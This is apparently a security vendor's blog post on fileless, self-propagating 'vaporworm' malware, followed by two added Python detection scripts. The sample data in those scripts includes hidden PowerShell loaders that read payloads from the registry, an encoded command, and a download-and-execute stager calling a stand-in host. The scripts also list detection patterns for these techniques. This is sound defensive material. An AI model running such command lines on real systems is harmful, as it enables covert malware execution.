Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be a virtual certainty.
But before I get into why and how this new threat will pick up steam this year, let’s take a step back to first examine fileless attacks and how they differ from traditional malware.
The fundamentals of fileless malware
Most conventional malware variants require users to save and execute a file on their system. The file itself could be a standalone executable binary, a trojanized application, or even just a blob of instructions and data that another component loads and runs. There are many opportunities to catch traditional malware, both as it traverses the network and when it is finally saved onto a system.
Fileless malware turns everything on its head. As the name suggests, fileless malware does not save anything to the target system’s storage for persistence. Instead, it leverages PowerShell and scripts, or even exploits legitimate processes to inject itself into computer memory and execute directly from there. Fileless malware is much better at covering its tracks because it doesn’t leave anything behind for traditional anti-malware tools to scan.
From recent headlines alone, you’re probably aware that fileless malware has been on a tear in recent years. According to one Ponemon report on the state of endpoint security, 29 percent of attacks used fileless malware in 2017. That’s a massive number, considering the fact that this type of malware is still relatively new. Even more frightening, 77 percent of all successful attacks in 2017 involved the use of fileless malware. The bottom line is, fileless malware is effective, which means it will continue to grow in prevalence over the coming years.
A new twist
Predicting the continued growth of fileless malware in 2019 would’ve been easy – almost a given for such a popular attack. Instead, we hypothesized that fileless malware might follow a similar evolutionary path to that of ransomware in 2017. That is, it will add worm-like self-propagation characteristics.
In April 2017, The Shadow Brokers leaked several Microsoft Windows zero-day vulnerabilities allegedly stolen from the NSA. It only took a month for ransomware authors to add these exploits to the first-ever ransomworm: WannaCry. This simple, yet devastating evolution turned WannaCry into one of the most destructive ransomware attacks in history.
Simply put, we suspected that cyber criminals would copy this trend, turning traditional fileless attacks into vaporworms by adding network exploits to proliferate across the internet automatically without any user interaction. Although there’s no way of knowing whether the first slew of these attacks will rely on old flaws like those that fueled WannaCry, or new releases yet to come, it’s clear that should vaporworms gain favor among bad guys in 2019, they’ll have the same far-reaching and indiscriminate impact that we saw with WannaCry.
The dawn of the vaporworm
Unfortunately, this prediction seems to be coming true uncomfortably quickly. Just one short month after we predicted the unholy emergence of self-propagating fileless malware, researchers at Trend Micro discovered a fileless Trojan that seemed to present some of those very same characteristics.
First, the malware saved its malicious payload in the Windows Registry, a key-value database that Windows stores in memory. It then created a second registry entry that instructed the operating system to load the payload from memory and execute it on every boot, giving it persistence. To spread, the malware installed a copy of itself on any removable storage connected to the system (thumb drives, external hard drives, etc.).
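The persistence pattern just described leaves a footprint a defender can audit: an autorun entry whose command launches a script host that pulls its payload back out of another registry value. The following Python audit is an added example, not code from the original post or from WatchGuard. It assumes autorun entries have already been exported to text as "Key\Value = Command" lines (the sample export below is constructed), and the script-host list and regular expressions are illustrative heuristics chosen for the example rather than a complete rule set.

```python
"""Audit Windows autorun (Run-key) entries for fileless-persistence patterns.

Added example; not from the original post. Assumes the entries have been
exported as 'Key\\Name = command' lines (constructed sample at the bottom).
On a live host you would feed it the output of a registry enumeration tool.
"""
import re

# Script hosts that in-memory loaders commonly use to reconstruct a payload.
# Assumption: illustrative list, not exhaustive.
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "regsvr32", "rundll32")

# Markers that suggest the command rebuilds code instead of starting a program.
SUSPICIOUS_PATTERNS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "registry_read": re.compile(r"(?:Get-ItemProperty|GetValue\(|RegRead|HKCU:|HKLM:|HKEY_)", re.I),
    "in_memory_exec": re.compile(r"(?:Invoke-Expression|\bIEX\b|FromBase64String|Reflection\.Assembly)", re.I),
    "hidden_window": re.compile(r"-(?:w|win|window|windowstyle)\s*hidden", re.I),
}


def parse_autorun_line(line):
    """Split 'HKCU\\...\\Run\\Name = command' into (key_path, command), or None."""
    if "=" not in line:
        return None
    key, _, command = line.partition("=")
    key, command = key.strip(), command.strip()
    if not key or not command:
        return None
    return key, command


def score_command(command):
    """Return the names of every pattern the command line matches."""
    hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(command)]
    # First token is the executable; strip quotes and the directory part.
    exe = command.split()[0].lstrip('"').rsplit("\\", 1)[-1].lower()
    if any(host in exe for host in SCRIPT_HOSTS):
        hits.insert(0, "script_host")
    return hits


def audit_autoruns(lines):
    """Return (key, command, hits) for entries that look like fileless persistence.

    An entry is flagged only when it launches a script host AND shows at least
    one payload-reconstruction marker, so a plain 'C:\\...\\app.exe' is left alone.
    """
    findings = []
    for line in lines:
        parsed = parse_autorun_line(line)
        if parsed is None:
            continue
        key, command = parsed
        hits = score_command(command)
        if "script_host" in hits and len(hits) > 1:
            findings.append((key, command, hits))
    return findings


# Constructed sample export: two benign entries and two that follow the
# "payload in a registry value, autorun entry loads it" pattern.
SAMPLE_AUTORUNS = [
    r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\Users\me\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r'HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = C:\Windows\system32\SecurityHealthSystray.exe',
    r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = powershell.exe -w hidden -c "IEX (Get-ItemProperty HKCU:\Software\Example).Blob"',
    r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Svc = mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").RegRead(""HKCU\Software\Example\Stage"")")',
]

if __name__ == "__main__":
    for key, command, hits in audit_autoruns(SAMPLE_AUTORUNS):
        print(f"[{', '.join(hits)}] {key}\n    {command}")
```

Requiring both a script host and a reconstruction marker keeps the audit from flagging every legitimate PowerShell logon script; the cost is that a loader using an unlisted host slips through, which is why the lists above should be tuned to what is normal on your own systems.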
While this malware was quite interesting in its combination of fileless execution and worm-like propagation using removable storage, it wasn’t a full-blown network worm like the one that spread the WannaCry ransomworm in 2017. Network propagation is what differentiates a “good” computer worm from a “great” computer worm, at least when it comes to infection rates.
Network propagation also makes it incredibly difficult to root out every infection from an attack. Imagine a scenario where a nation state wants to siphon off engineering work from a foreign defense contractor. In the not-too-distant future, we could see an incredibly effective and dangerous malware attack that combines Wannacry’s rapid propagation with fileless malware’s ability to hide its presence. And as countless attack techniques have demonstrated previously, what starts with nation states usually trickles down to the civilian cyber-criminal world soon enough.
Avoid becoming a vaporworm victim in 2019
It remains to be seen how prevalent vaporworms will become. Every organization, regardless of size or industry, must now be prepared to defend against these attacks. Fileless malware is notoriously tricky to identify, and the added self-spreading mechanism only amplifies the challenge.
Fortunately, tools like intrusion prevention services are capable of detecting and blocking network exploits, and halting vaporworm infections. Additionally, Endpoint Detection and Response (EDR) solutions that monitor process behavior for suspicious activity can detect malicious activity before it’s too late. As always, understanding the threat is half the battle. By educating yourself and your organization about the potential for and mechanics of vaporworm attacks, you can ensure you have the necessary protections in place to avoid becoming a victim.
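The kind of process-behavior check an EDR product performs can be illustrated with a few lines of logic over process-creation telemetry. The snippet below is an added example, not code from the original post or from any vendor product. It assumes the telemetry has already been normalised into dicts with the fields shown (the sample events are constructed), and the unusual-parent list and command-line markers are illustrative heuristics that a real deployment would tune to its own baseline.

```python
"""Flag process-creation events that look like in-memory script execution.

Added example; not from the original post or any EDR product. Assumes each
event is a dict with pid, image, parent_image and command_line (constructed
sample events at the bottom).
"""
import re

# Script hosts a fileless payload typically runs inside. Assumption: illustrative.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "regsvr32.exe", "rundll32.exe"}

# Parents that normally have no reason to start a script host: Office apps
# (document-borne loaders) and system services (post-exploitation from a
# network exploit). Assumption: illustrative; baseline against your own hosts.
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                   "spoolsv.exe", "lsass.exe", "wmiprvse.exe"}

ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
DOWNLOAD_OR_EVAL = re.compile(
    r"(?:DownloadString|Net\.WebClient|Invoke-Expression|\bIEX\b|FromBase64String)", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_event(event):
    """Return the reasons an event is suspicious (empty list when it looks normal)."""
    child = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event.get("command_line", "")
    reasons = []
    if child in SCRIPT_HOSTS:
        if parent in UNUSUAL_PARENTS:
            reasons.append(f"{parent} spawned {child}")
        if ENCODED.search(cmd):
            reasons.append("encoded command line")
        if DOWNLOAD_OR_EVAL.search(cmd):
            reasons.append("in-memory download/eval")
    return reasons


def triage(events):
    """Return [(pid, reasons)] for every event with at least one reason, in order."""
    alerts = []
    for event in events:
        reasons = evaluate_event(event)
        if reasons:
            alerts.append((event["pid"], reasons))
    return alerts


# Constructed sample telemetry: one benign admin script, one Office-spawned
# encoded PowerShell, one service-spawned in-memory stager, one benign service.
SAMPLE_EVENTS = [
    {"pid": 3004, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"pid": 4212, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -w hidden -enc SQBFAFgAIABOAGUAdwAtAE8AYgBqAGUAYwB0AA=="},
    {"pid": 5120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\lsass.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/payload')\""},
    {"pid": 6000, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {'; '.join(reasons)}")
```

The point of the parent/child check is that it does not depend on anything written to disk: a script host started by a service process or an Office application is anomalous regardless of what the payload contains, which is exactly the signal a fileless loader cannot avoid generating.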